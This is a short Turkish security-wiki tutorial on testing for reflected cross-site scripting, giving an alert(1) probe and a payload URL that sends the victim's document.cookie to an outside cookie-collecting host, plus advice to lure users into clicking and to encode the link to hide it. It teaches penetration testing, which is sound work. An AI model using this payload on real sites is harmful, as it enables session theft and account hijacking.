Yansıtılan (Reflected) XSS Testleri

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Yansıtılan XSS zafiyetinden faydalanılarak kullanıcıların tarayıcılarında hedef sistem üzerinde kod çalıştırmak.

Araç:

  • Firefox 22

Adımlar:

  • Hedef uygulamada girdi noktalarından girilen değerlerin ekranda gösterildiği veya sayfanın içinde bir şekilde kullanıldığı durumlar aranır. Örneğin arama kutusuna “abc” girildiğinde “abc” için hiçbir sonuç bulunamadı yazan bir sayfada, arama kutusuna <script>alert(1)</script> yazıldığında javascript kodunun çalışıp çalışmadığı gözlenir.
  • Kodu süzen filtreler varsa bunlar atlatılmaya çalışılır. Başarılı bir payload hazırlandığında örneğin:
hedefsite.com/ara.asp?q=<script>document.location=”cookiekaydet.com/kaydet.php?val”=+document.cookie</script>
  • Kullanıcılar linke tıklamaları için ikna edilir, böylece saldırı tamamlanır. Tabi burada payloada çeşitli encoding (şifreleme) yöntemleri uygulanarak şüpheli görüntü ortadan kaldırılabilir.

Kaynak:[değiştir]

  • XSS Attacks - Cross Site Scripting Exploits & Defense